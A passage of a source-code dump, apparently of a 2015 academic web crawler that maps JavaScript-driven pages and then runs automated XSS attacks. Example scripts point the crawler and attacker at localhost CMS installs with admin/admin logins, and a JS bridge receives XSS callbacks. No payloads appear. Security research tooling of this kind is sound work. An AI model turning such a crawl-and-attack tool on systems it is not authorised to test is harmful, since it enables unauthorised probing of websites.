128 |             response_code, html_after_timeouts, new_clickables, forms, links, timemimg_requests = self._form_handler.submit_form(login_form, page_with_login_form, login_data)
129 |         except ValueError:
130 |             return None
131 |         #TODO: Put building of Webpage inside submit function
132 |         page_after_login = WebPage(-1, page_with_login_form.url, html_after_timeouts)
133 |         page_after_login.clickables = new_clickables
134 |         page_after_login.links = links
135 |         page_after_login.timing_requests = timemimg_requests
136 |         page_after_login.forms = forms
137 |         self.domain_handler.complete_urls_in_page(page_after_login)
138 |         self.domain_handler.analyze_urls(page_after_login)
139 |         self.async_request_handler.handle_requests(page_after_login)
140 |         return page_after_login
141 | 
142 |     def _handle_possible_logout(self):
143 |         """
144 |         Handles a possible logout
145 |         :return: True is we were not logged out and false if we were logged out
146 |         """
147 |         retries = 0
148 |         max_retries = 3
149 |         while retries < max_retries:
150 |             logging.debug("Start with relogin try number: {}".format(retries+1))
151 |             page_with_login_form = self._get_webpage(self.user.url_with_login_form)
152 |             login_form, login_clickable = self._find_form_with_special_parameters(page_with_login_form, self.user.login_data, self.interactive_login_form_search)
153 |             if login_form is not None:
154 |             #So login_form is visible, we are logged out
155 |                 logging.debug("Logout detected, visible login form...")
156 |                 hopefully_reloggedin_page = self._login_and_return_webpage(login_form, page_with_login_form, self.user.login_data, login_clickable)
157 |                 if hopefully_reloggedin_page is None:
158 |                     retries += 1
159 |                     logging.debug("Relogin attempt number {} failed".format(retries))
160 |                     sleep(2000)
161 |                 else:
162 |                     login_form, login_clickable = self._find_form_with_special_parameters(hopefully_reloggedin_page, self.user.login_data)
163 |                     if login_form is None:
164 |                         logging.debug("Relogin successfull...continue")
165 |                         return False
166 |                     else:
167 |                         logging.debug("Relogin fails, loginform is still present...")
168 |                         retries += 1
169 |                         sleep(2000)
170 |             else:
171 |                 logging.debug("Login form is not there... we can continue (I hope)")
172 |                 if retries < 3:
173 |                     return True
174 |                 else:
175 |                     return False
176 |         raise LoginFailed("We cannot login anymore... stop crawling here")
177 | 
178 | 
179 |     def _get_webpage(self, url):
180 |         response_code, result = self._dynamic_analyzer.analyze(url, timeout=10)
181 |         self.domain_handler.complete_urls_in_page(result)
182 |         self.domain_handler.analyze_urls(result)
183 |         self.async_request_handler.handle_requests(result)
184 |         return result
185 | 
186 |     def _check_login_status_with_cookies(self):
187 |         if self.cookie_num > 0:
188 |             current_cookie_num = count_cookies(self._network_access_manager, self.user.url_with_login_form)
189 |             return current_cookie_num >= self.cookie_num
190 |         return True
191 | 


--------------------------------------------------------------------------------
/crawler/core/jsbridge.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import json
19 | from PyQt5.QtCore import QObject, pyqtSlot
20 | 
21 | __author__ = 'constantin'
22 | 
23 | class JsBridge(QObject):
24 | 
25 |     def __init__(self, analyzer):
26 |         QObject.__init__(self)
27 |         self.analyzer = analyzer
28 |         self._ajax_request = []
29 | 
30 |     @pyqtSlot(str)
31 |     def add_eventListener_to_element(self, msg):
32 |         msg = json.loads(msg)
33 |         self.analyzer.add_eventlistener_to_element(msg)
34 | 
35 |     @pyqtSlot(str)
36 |     def xmlHTTPRequestOpen(self, msg):
37 |         msg = json.loads(msg)
38 |         self._ajax_request.append(msg)
39 | 
40 |     @pyqtSlot(str)
41 |     def xmlHTTPRequestSend(self, msg):
42 |         msg = json.loads(msg)
43 |         according_open = self._ajax_request.pop(0)
44 |         try:
45 |             according_open['parameters'] = msg['parameters'][0]
46 |         except IndexError:
47 |             according_open['parameters'] = ""
48 |         self.analyzer.capturing_requests(according_open)
49 | 
50 |     @pyqtSlot(str)
51 |     def timeout(self, msg):
52 |         msg = json.loads(msg)
53 |         msg['type'] = "timeout"
54 |         self.analyzer.capture_timeout_call(msg)
55 | 
56 |     @pyqtSlot(str)
57 |     def intervall(self, msg):
58 |         msg = json.loads(msg)
59 |         msg['type'] = "intervall"
60 |         #logging.debug(msg)
61 |         self.analyzer.capture_timeout_call(msg)
62 | 
63 |     @pyqtSlot(str)
64 |     def add_eventlistener_to_element(self, msg):
65 |         msg = json.loads(msg)
66 |         #logging.debug(msg)
67 |         self.analyzer.add_eventlistener_to_element(msg)
68 | 
69 |     @pyqtSlot(str)
70 |     def attack(self, msg):
71 |         self.analyzer.xss_callback(msg)


--------------------------------------------------------------------------------
/crawler/database/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 


--------------------------------------------------------------------------------
/crawler/database/databasemanager.py:
--------------------------------------------------------------------------------
  1 | """
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | 
 17 | This Class is responsible for storage related things
 18 | 
 19 | """
 20 | from database.database import Database
 21 | from models.clickabletype import ClickableType
 22 | 
 23 | 
 24 | class DatabaseManager(object):
 25 |     
 26 |     def __init__(self, user, dropping=True):
 27 |         self._database = Database(user.username, dropping)
 28 |         self._database.insert_user_into_db(user)
 29 |         self._web_page_cache = []
 30 |         self._deltapage_cache = []
 31 |         self._current_session = None
 32 |         self.MAX_CACHE_SIZE = 0
 33 |         self._current_session = user.session
 34 | 
 35 |     def return_session_id_to_username(self, username):
 36 |         return self._database.get_user_to_username(username)
 37 | 
 38 |     def store_web_page(self, web_page):
 39 |         if self.MAX_CACHE_SIZE > 0:
 40 |             if len(self._web_page_cache) + 1 > self.MAX_CACHE_SIZE:
 41 |                 del self._web_page_cache[-1]
 42 |             self._web_page_cache.insert(0, web_page)
 43 |         self._database.insert_page_into_db(self._current_session, web_page)
 44 |     
 45 |     def get_page_to_id(self, page_id):
 46 |         page = self.get_web_page_to_id(page_id)
 47 |         if page is not None:
 48 |             return page
 49 |         page = self.get_delta_page_to_id(page_id)
 50 |         if page is not None:
 51 |             return page
 52 |         return None
 53 |     
 54 |     def store_delta_page(self, delta_page):
 55 |         if self.MAX_CACHE_SIZE > 0:
 56 |             if len(self._deltapage_cache) +1 > self.MAX_CACHE_SIZE:
 57 |                 del self._deltapage_cache[-1]
 58 |             self._deltapage_cache.insert(0, delta_page)
 59 |         self._database.insert_delta_page_into_db(self._current_session, delta_page)
 60 | 
 61 |     def get_page_to_url(self, url):
 62 |         try:
 63 |             url = url.toString()
 64 |         except AttributeError:
 65 |             url = url
 66 |         
 67 |         return self._database.get_webpage_to_url_from_db(self._current_session, url)
 68 |     
 69 |     def get_web_page_to_id(self, page_id):
 70 |         for page in self._web_page_cache:
 71 |             if page_id == page.id:
 72 |                 return page
 73 |         return self._database.get_webpage_to_id_from_db(self._current_session, page_id)
 74 |             
 75 |     
 76 |     def get_delta_page_to_id(self, delta_page_id):
 77 |         for page in self._deltapage_cache:
 78 |             if delta_page_id == page.id:
 79 |                 return page
 80 |             
 81 |         return self._database.get_delta_page_to_id(self._current_session, delta_page_id)
 82 | 
 83 |     def url_exists(self, url):
 84 |         return self._database.url_exists(self._current_session, url)
 85 |     
 86 |     def get_next_url_for_crawling(self):
 87 |         return self._database.get_next_url_for_crawling(self._current_session)
 88 | 
 89 |     def get_all_unvisited_urls_sorted_by_hash(self):
 90 |         return self._database.get_all_unvisited_urls_sorted_by_hash(self._current_session)
 91 |     
 92 |     def insert_url_into_db(self, url):
 93 |         return self._database.insert_url_into_db(self._current_session, url)
 94 |     
 95 |     def insert_redirected_url(self, url):
 96 |         return self._database.insert_url_into_db(self._current_session, url, is_redirected_url=True)
 97 |         
 98 |     def visit_url(self, url, webpage_id, response_code, redirected_to = None):
 99 |         self._database.visit_url(self._current_session, url, webpage_id, response_code, redirected_to)
100 |     
101 |     def extend_ajax_requests_to_webpage(self, webpage, ajax_reuqests):
102 |         self._database.extend_ajax_requests_to_webpage(self._current_session, webpage, ajax_reuqests)
103 |     
104 |     
105 |     def get_all_crawled_delta_pages(self, url=None):
106 |         return self._database.get_all_crawled_deltapages_to_url_from_db(self._current_session, url)
107 |     
108 |     
109 |     def update_clickable(self, web_page_id, clickable):
110 |         if clickable.clickable_type == ClickableType.IgnoredByCrawler or clickable.clickable_type == ClickableType.UnsupportedEvent:
111 |             self._database.set_clickable_ignored(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type)
112 |         else:
113 |             self._database.set_clickable_clicked(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type, clickable.links_to)
114 | 
115 |     def get_url_structure(self, hash):
116 |         return self._database.get_url_structure_from_db(self._current_session, hash)
117 | 
118 |     def insert_url_structure(self, url_description):
119 |         self._database.insert_url_structure_into_db(self._current_session, url_description)
120 | 
121 |     def get_all_pages(self):
122 |         return self._database.get_all_pages(self._current_session)
123 | 
124 |     def get_url_structure_to_hash(self, url_hash):
125 |         return self._database.get_url_structure_from_db(self._current_session,url_hash)
126 | 
127 |     def insert_url_structure_into_db(self, url_description):
128 |         self._database.insert_url_structure_into_db(self._current_session, url_description)
129 | 
130 |     def get_url_to_id(self, id):
131 |         return self._database.get_url_to_id(self._current_session, id)
132 | 
133 |     def write_clusters(self, url_hash, clusters):
134 |         self._database.write_cluster(self._current_session, url_hash, clusters)
135 | 
136 |     def get_clusters(self, url_hash):
137 |         return self._database.get_clusters(self._current_session, url_hash)
138 | 
139 |     def count_visited_url_per_hash(self, url_hash):
140 |         return self._database.count_visited_urls_per_hash(self._current_session, url_hash)
141 | 
142 |     def get_all_url_structures(self):
143 |         return  self._database.get_all_url_structures(self._current_session)
144 | 
145 |     def get_all_visited_urls(self):
146 |         return self._database.get_all_successfully_visited_urls(self._current_session)
147 | 
148 |     def get_one_visited_url_per_structure(self):
149 |         return self._database.get_one_visited_url_per_structure(self._current_session)
150 | 
151 |     def insert_attack_result(self, result, attack_url):
152 |         self._database.insert_attack_result(self._current_session, result, attack_url)
153 | 
154 |     def get_asyncrequest_structure(self, structure_hash=None):
155 |         return self._database.get_asyncrequest_structure(self._current_session, structure_hash)
156 | 
157 |     def get_all_get_forms(self):
158 |         return self._database.get_all_get_forms(self._current_session)
159 | 
160 |     def get_one_form_per_destination(self):
161 |         return self._database.get_one_form_per_destination(self._current_session)
162 | 
163 |     def num_of_ignored_urls(self, url_hash):
164 |         return self._database.num_of_ignored_urls(self._current_session, url_hash)
165 | 
166 |     def url_visited(self, url):
167 |         return self._database.url_visited(self._current_session, url)
168 | 
169 |     def get_id_to_url(self, url):
170 |         return self._database.get_id_to_url(self._current_session, url)
171 | 
172 |     def get_all_urls_to_domain(self, domain):
173 |         return self._database.get_all_urls_to_domain(self._current_session, domain)


--------------------------------------------------------------------------------
/crawler/example.py:
--------------------------------------------------------------------------------
 1 | ﻿'''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import logging
19 | 
20 | from attacker import Attacker
21 | from crawler import Crawler
22 | from database.databasemanager import DatabaseManager
23 | from utils.config import CrawlConfig, AttackConfig
24 | from models.utils import CrawlSpeed
25 | from utils.user import User
26 | import csv
27 | from utils.utils import calculate_similarity_between_pages
28 | 
29 | logging.basicConfig(level=logging.DEBUG,
30 |                     format='%(asctime)s: %(levelname)s - %(message)s',
31 |                     #filename='Attack.log',
32 |                     #filemode='w'
33 |                     )
34 | 
35 | if __name__ == '__main__':
36 |     logging.info("Crawler started...")
37 | 
38 |     # This is for example to crawl a wordpress installation as logged in user
39 |     user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
40 | 
41 |     url = "http://localhost/"
42 | 
43 |     # This is the confuigrtion I used for the experiments
44 |     crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast)
45 |     attack_config = AttackConfig(url)
46 | 
47 |     database_manager = DatabaseManager(user, dropping=True)
48 |     # Uncomment out the end of the next line to use a proxy
49 |     crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
50 |     crawler.crawl(user)
51 |     logging.info("Crawler finished")
52 | 
53 |     logging.info("Start attacking...")
54 |     attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
55 |     attacker.attack(user)
56 |     logging.info("Finish attacking...")


--------------------------------------------------------------------------------
/crawler/experiments_paper.py:
--------------------------------------------------------------------------------
 1 | ﻿'''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | 
17 | Created on 12.11.2014
18 | 
19 | @author: constantin
20 | '''
21 | import logging
22 | 
23 | from attacker import Attacker
24 | from crawler import Crawler
25 | from database.databasemanager import DatabaseManager
26 | from utils.config import CrawlConfig, AttackConfig
27 | from models.utils import CrawlSpeed
28 | from utils.user import User
29 | import csv
30 | from utils.utils import calculate_similarity_between_pages
31 | 
32 | logging.basicConfig(level=logging.DEBUG,
33 |                     format='%(asctime)s: %(levelname)s - %(message)s',
34 |                     #datefmt='%d.%m.%Y %H:%M:%S.%f',
35 |                     #filename='Attack.log',
36 |                     #filemode='w'
37 |                     )
38 | 
39 | if __name__ == '__main__':
40 |     logging.info("Crawler started...")
41 | 
42 |     #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
43 |     #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username" : "admin", "pass" : "admin"})
44 |     user = User("Test42", 0, "http://localhost:8080/", login_data = {"user": "admin", "password": "admin"}, session="ABC")
45 |     #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"})
46 |     #user = User("Gallery2", 0, "http://localhost:8080/", login_data= {"name": "admin", "password": "34edbc"}, session= "ABC")
47 |     #user = User("Gallery41", 0, session="ABC")
48 |     #user = User("PHPbb64", 0, "http://localhost:8080/phpbb/ucp.php?mode=login", login_data = {"username": "admin", "password": "adminadmin"}, session= "ABC")
49 |     #user = User("Joomla", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"}, session= "ABC")
50 |     #user = User("ModX", 0 , "http://localhost:8080/manager/", login_data= {"username": "admin", "password": "adminadmin"}, session="ABC")
51 |     #user = User("Pimcore", 0, "http://localhost:8080/admin/login/", login_data={"username": "admin", "password": "admin"}, session="ABC")
52 |     #user = User("Piwigo", 0, "http://localhost:8080/", login_data={"username": "admin", "password": "admin"}, session="ABC")
53 |     #user = User("Concret5", 0, "http://localhost:8080/index.php/login", login_data={"uName": "admin", "uPassword": "admin"})
54 |     #user = User("Mediawiki", 0)
55 |     #user = User("MyBB2", 0, "http://localhost:8080/index.php", login_data= {"quick_username": "admin", "quick_password": "admin"}, session="ABC")
56 |     #user = User("MyBB2", 0, "http://localhost:8080/admin/index.php", login_data= {"username": "admin", "password": "admin"}, session="ABC")
57 |     #user = User("local", 0)
58 | 
59 |     url = "http://localhost:8080/"
60 |     crawler_config = CrawlConfig("Database Name", url, max_depth=2, max_click_depth=5, crawl_speed=CrawlSpeed.Fast)
61 |     attack_config = AttackConfig(url)
62 | 
63 |     database_manager = DatabaseManager(user, dropping=True)
64 |     crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
65 |     crawler.crawl(user)
66 |     # TODO: It seems to be that, there is an error if we instanciate crawler and attacker and then call the crawl function. Maybe use one global app!
67 |     logging.info("Crawler finished")
68 |     logging.info("Start attacking...")
69 |     #attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
70 |     #attacker.attack(user)
71 |     logging.info("Finish attacking...")
72 | 


--------------------------------------------------------------------------------
/crawler/js/addeventlistener_wrapper.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *Copyright (C) 2015 Constantin Tschuertz
 3 |  * 
 4 |  * This program is free software: you can redistribute it and/or modify
 5 |  * it under the terms of the GNU General Public License as published by
 6 |  * the Free Software Foundation, either version 3 of the License, or
 7 |  * any later version.
 8 |  *
 9 |  *This program is distributed in the hope that it will be useful,
10 |  * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 |  * GNU General Public License for more details.
13 |  *
14 |  * You should have received a copy of the GNU General Public License
15 |  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 |  */
17 | 
18 | 
19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery
20 | callbackWrap(Element.prototype, "addEventListener", 1, addEventListenerWrapper);
21 | callbackWrap(Document.prototype, "addEventListener", 1,
22 | 		bodyAddEventListenerWrapper);


--------------------------------------------------------------------------------
/crawler/js/ajax_interceptor.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *Copyright (C) 2015 Constantin Tschuertz
 3 |  * 
 4 |  * This program is free software: you can redistribute it and/or modify
 5 |  * it under the terms of the GNU General Public License as published by
 6 |  * the Free Software Foundation, either version 3 of the License, or
 7 |  * any later version.
 8 |  *
 9 |  *This program is distributed in the hope that it will be useful,
10 |  * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 |  * GNU General Public License for more details.
13 |  *
14 |  * You should have received a copy of the GNU General Public License
15 |  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 |  */
17 | 
18 | // This js wrapps the open function from XMLHttpRequest 
19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen);
20 | callInterceptionWrapper(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend);


--------------------------------------------------------------------------------
/crawler/js/ajax_observer.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *Copyright (C) 2015 Constantin Tschuertz
 3 |  * 
 4 |  * This program is free software: you can redistribute it and/or modify
 5 |  * it under the terms of the GNU General Public License as published by
 6 |  * the Free Software Foundation, either version 3 of the License, or
 7 |  * any later version.
 8 |  *
 9 |  *This program is distributed in the hope that it will be useful,
10 |  * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 |  * GNU General Public License for more details.
13 |  *
14 |  * You should have received a copy of the GNU General Public License
15 |  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 |  */
17 | 
18 | // This js wrapps the open function from XMLHttpRequest 
19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen);
20 | callbackWrap(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend);


--------------------------------------------------------------------------------
/crawler/js/lib.js:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * Simulate.js from https://github.com/airportyh/simulate.js
  3 |  */
  4 | !function() {
  5 | 	function extend(dst, src) {
  6 | 		for ( var key in src)
  7 | 			dst[key] = src[key]
  8 | 		return src
  9 | 	}
 10 | 	var Simulate = {
 11 | 		event : function(element, eventName) {
 12 | 			if (document.createEvent) {
 13 | 				var evt = document.createEvent("HTMLEvents")
 14 | 				evt.initEvent(eventName, true, true)
 15 | 				element.dispatchEvent(evt)
 16 | 			} else {
 17 | 				var evt = document.createEventObject()
 18 | 				element.fireEvent('on' + eventName, evt)
 19 | 			}
 20 | 		},
 21 | 		keyEvent : function(element, type, options) {
 22 | 			var evt, e = {
 23 | 				bubbles : true,
 24 | 				cancelable : true,
 25 | 				view : window,
 26 | 				ctrlKey : false,
 27 | 				altKey : false,
 28 | 				shiftKey : false,
 29 | 				metaKey : false,
 30 | 				keyCode : 0,
 31 | 				charCode : 0
 32 | 			}
 33 | 			extend(e, options)
 34 | 			if (document.createEvent) {
 35 | 				try {
 36 | 					evt = document.createEvent('KeyEvents')
 37 | 					evt.initKeyEvent(type, e.bubbles, e.cancelable, e.view,
 38 | 							e.ctrlKey, e.altKey, e.shiftKey, e.metaKey,
 39 | 							e.keyCode, e.charCode)
 40 | 					element.dispatchEvent(evt)
 41 | 				} catch (err) {
 42 | 					evt = document.createEvent("Events")
 43 | 					evt.initEvent(type, e.bubbles, e.cancelable)
 44 | 					extend(evt, {
 45 | 						view : e.view,
 46 | 						ctrlKey : e.ctrlKey,
 47 | 						altKey : e.altKey,
 48 | 						shiftKey : e.shiftKey,
 49 | 						metaKey : e.metaKey,
 50 | 						keyCode : e.keyCode,
 51 | 						charCode : e.charCode
 52 | 					})
 53 | 					element.dispatchEvent(evt)
 54 | 				}
 55 | 			}
 56 | 		}
 57 | 	}
 58 | 	Simulate.keypress = function(element, chr) {
 59 | 		var charCode = chr.charCodeAt(0)
 60 | 		this.keyEvent(element, 'keypress', {
 61 | 			keyCode : charCode,
 62 | 			charCode : charCode
 63 | 		})
 64 | 	}
 65 | 	Simulate.keydown = function(element, chr) {
 66 | 		var charCode = chr.charCodeAt(0)
 67 | 		this.keyEvent(element, 'keydown', {
 68 | 			keyCode : charCode,
 69 | 			charCode : charCode
 70 | 		})
 71 | 	}
 72 | 	Simulate.keyup = function(element, chr) {
 73 | 		var charCode = chr.charCodeAt(0)
 74 | 		this.keyEvent(element, 'keyup', {
 75 | 			keyCode : charCode,
 76 | 			charCode : charCode
 77 | 		})
 78 | 	}
 79 | 	Simulate.change = function(element) {
 80 | 		var evt = document.createEvent("HTMLEvents");
 81 | 		evt.initEvent("change", false, true);
 82 | 		element.dispatchEvent(evt);
 83 | 
 84 | 	}
 85 | 	//Simulate.click = function(element){
 86 | 	//	element.click();
 87 | 	//}
 88 | 	var events = ['click','focus', 'blur', 'dblclick', 'input', 'mousedown',
 89 | 			'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize',
 90 | 			'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave' ]
 91 | 	for (var i = events.length; i--;) {
 92 | 		var event = events[i]
 93 | 		Simulate[event] = (function(evt) {
 94 | 			return function(element) {
 95 | 				this.event(element, evt)
 96 | 			}
 97 | 		}(event))
 98 | 	}
 99 | 	if (typeof module !== 'undefined') {
100 | 		module.exports = Simulate
101 | 	} else if (typeof window !== 'undefined') {
102 | 		window.Simulate = Simulate
103 | 	} else if (typeof define !== 'undefined') {
104 | 		define(function() {
105 | 			return Simulate
106 | 		})
107 | 	}
108 | }();
109 | /*
110 |  * From down here
111 |  * 
112 |  *Copyright (C) 2015 Constantin Tschuertz
113 |  * 
114 |  * This program is free software: you can redistribute it and/or modify
115 |  * it under the terms of the GNU General Public License as published by
116 |  * the Free Software Foundation, either version 3 of the License, or
117 |  * any later version.
118 |  *
119 |  *This program is distributed in the hope that it will be useful,
120 |  * but WITHOUT ANY WARRANTY; without even the implied warranty of
121 |  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
122 |  * GNU General Public License for more details.
123 |  *
124 |  * You should have received a copy of the GNU General Public License
125 |  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
126 |  *
127 |  */
128 | 
129 | 
130 | function callbackWrap(object, property, argumentIndex, wrapperFactory) {
131 | 	var original = object[property];
132 | 	object[property] = function() {
133 | 		wrapperFactory(this, arguments);
134 | 		return original.apply(this, arguments);
135 | 	}
136 | 	return original;
137 | }
138 | 
139 | var max_waiting_time = 65000
140 | var min_waiting_time = 0
141 | 
142 | function timingCallbackWrap(object, property, argumentIndex, wrapperFactory) {
143 | 	var original = object[property];
144 | 
145 | 	object[property] = function() {
146 | 		if (arguments[1] > max_waiting_time) {
147 | 			arguments[1] = max_waiting_time
148 | 		}
149 | 		wrapperFactory(this, arguments);
150 | 		return original.apply(this, arguments);
151 | 	}
152 | 	return original;
153 | }
154 | 
155 | function callInterceptionWrapper(object, property, argumentIndex,
156 | 		wrapperFactory) {
157 | 	var original = object[property];
158 | 	object[property] = function() {
159 | 		wrapperFactory(this, arguments);
160 | 		return null;
161 | 	}
162 | 	return original;
163 | }
164 | 
165 | function XMLHTTPObserverOpen(elem, args) {
166 | 	resp = {
167 | 		"url" : args[1],
168 | 		"method" : args[0]
169 | 	};
170 | 	random_num =  Math.floor((Math.random() * 10000) + 1);
171 | 	//console.log("Uniq Id set: " + random_num);
172 | 	elem.jaeks_id = random_num;
173 | 	resp = JSON.stringify(resp);
174 | 	jswrapper.xmlHTTPRequestOpen(resp)
175 | }
176 | 
177 | function XMLHTTPObserverSend(elem, args) {
178 | 	elems = []
179 | 	for (i = 0; i < args.length; i++) {
180 | 		elems.push(args[i])
181 | 	}
182 | 	resp = {
183 | 		"parameters" : elems
184 | 	};
185 | 	//console.log("Uniq Id: " + elem.jaeks_id);
186 | 	resp = JSON.stringify(resp)
187 | 	jswrapper.xmlHTTPRequestSend(resp)
188 | }
189 | 
190 | function timeoutWrapper(elem, args) {
191 | 	function_id = MD5(args[0].toString());
192 | 	resp = {
193 | 		"function_id" : function_id,
194 | 		"time" : args[1]
195 | 	};
196 | 	resp = JSON.stringify(resp)
197 | 	jswrapper.timeout(resp)
198 | }
199 | 
200 | function intervallWrapper(elem, args) {
201 | 	function_id = MD5(args[0].toString());
202 | 	resp = {
203 | 		"function_id" : function_id,
204 | 		"time" : args[1]
205 | 	};
206 | 	resp = JSON.stringify(resp)
207 | 	jswrapper.intervall(resp)
208 | }
209 | 
210 | function getXPath(element) {
211 | 	try {
212 | 		var xpath = '';
213 | 		for (; element && element.nodeType == 1; element = element.parentNode) {
214 | 			var sibblings = element.parentNode.childNodes;
215 | 			var same_tags = []
216 | 			for (var i = 0; i < sibblings.length; i++) { // collecting same
217 | 				if (element.tagName === sibblings[i].tagName) {
218 | 					same_tags[same_tags.length] = sibblings[i]
219 | 				}
220 | 			}
221 | 
222 | 			var id = same_tags.indexOf(element) + 1;
223 | 			id > 1 ? (id = '[' + id + ']') : (id = '');
224 | 			xpath = '/' + element.tagName.toLowerCase() + id + xpath;
225 | 		}
226 | 		return xpath;
227 | 	} catch (e) {
228 | 		console.log("Error: " + e)
229 | 		return "";
230 | 	}
231 | }
232 | 
233 | function addEventListenerWrapper(elem, args) {
234 | 	tag = elem.tagName
235 | 	dom_adress = "";
236 | 	id = elem.id;
237 | 	html_class = elem.className;
238 |     //console.log("AddEventLIstenerWrapper: " + tag + " - Event: " + args[0])
239 | 	dom_adress = getXPath(elem);
240 | 	if (dom_adress.indexOf("/html/body") == -1) {
241 | 		console.log("Domadress is not valid: " + dom_adress)
242 | 		return
243 | 	}
244 | 	function_id = MD5(args[1].toString())
245 | 	resp = {
246 | 		"event" : args[0],
247 | 		"function_id" : function_id,
248 | 		"addr" : dom_adress,
249 | 		"id" : id,
250 | 		"tag" : tag,
251 | 		"class" : html_class
252 | 	}
253 | 	//console.log(resp)
254 | 	resp = JSON.stringify(resp)
255 | 	jswrapper.add_eventListener_to_element(resp)
256 | 	if (args[0] == "change") {
257 | 		inputs = elem.querySelectorAll("input");
258 | 		selects = elem.querySelectorAll("select");
259 | 		options = elem.querySelectorAll("option");
260 | 
261 | 		for (i = 0; i < inputs.length; i++) {
262 | 			e = inputs[i];
263 | 			if (e.getAttribute("type") == "radio"
264 | 					|| e.getAttribute("type") == "checkbox") {
265 | 				tag = e.tagName
266 | 				id = e.id;
267 | 				html_class = e.className;
268 | 				dom_adress = getXPath(e);
269 | 				function_id = "";
270 | 				resp = {
271 | 					"event" : "change",
272 | 					"function_id" : function_id,
273 | 					"addr" : dom_adress,
274 | 					"id" : id,
275 | 					"tag" : tag,
276 | 					"class" : html_class
277 | 				}
278 | 				resp = JSON.stringify(resp)
279 | 				jswrapper.add_eventListener_to_element(resp)
